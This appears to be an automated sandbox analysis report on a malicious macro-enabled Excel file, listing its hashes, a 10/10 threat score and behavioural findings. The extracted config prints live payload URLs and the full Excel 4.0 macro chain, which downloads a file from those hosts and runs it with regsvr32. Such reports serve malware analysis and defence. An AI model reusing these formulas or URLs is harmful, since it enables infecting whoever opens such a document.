General
-
Target
paquete_3841728.xlsm
-
Size
46KB
-
Sample
230216-xkd3jsbb87
-
MD5
848e5d22345ad8b064cf0da589a28db2
-
SHA1
e1dd2f21d103c0e012dcb29ea7f982803b37689c
-
SHA256
34ebe038a8b30eebad90de95dc17f118029a11a0450ceb36fee4741a4c226cb3
-
SHA512
2e95cfd295e94e5d1e69710c16a20b5f6c4797695f670732c0607dccd0260c9d50f57dae59f277fb62b5959b8d88453a38cf5a4708d73fea810bd6601c2ee118
-
SSDEEP
768:SEoTBvDOevZCwrvtWzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2ceI:9olvDmtT5fTR4Lh1NisFYBc3cr+UqVUz
Behavioral task
behavioral1
Sample
paquete_3841728.xlsm
Resource
win10-20220812-en
Malware Config
Extracted
http://moveconnects.com/wp-admin/network/7T8g9DAohsL/
http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/
http://mentalpeaks.care/kymogram/ex1hhh/
https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/
http://meca-global.com/okickb/Vm1FMsVcbL/
http://bizfedlacounty.org/wp-auth/GxsV/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/wp-admin/network/7T8g9DAohsL/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mentalpeaks.care/kymogram/ex1hhh/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/okickb/Vm1FMsVcbL/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bizfedlacounty.org/wp-auth/GxsV/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()
Extracted
http://moveconnects.com/wp-admin/network/7T8g9DAohsL/
Targets
-
-
Target
paquete_3841728.xlsm
-
Size
46KB
-
MD5
848e5d22345ad8b064cf0da589a28db2
-
SHA1
e1dd2f21d103c0e012dcb29ea7f982803b37689c
-
SHA256
34ebe038a8b30eebad90de95dc17f118029a11a0450ceb36fee4741a4c226cb3
-
SHA512
2e95cfd295e94e5d1e69710c16a20b5f6c4797695f670732c0607dccd0260c9d50f57dae59f277fb62b5959b8d88453a38cf5a4708d73fea810bd6601c2ee118
-
SSDEEP
768:SEoTBvDOevZCwrvtWzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2ceI:9olvDmtT5fTR4Lh1NisFYBc3cr+UqVUz
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-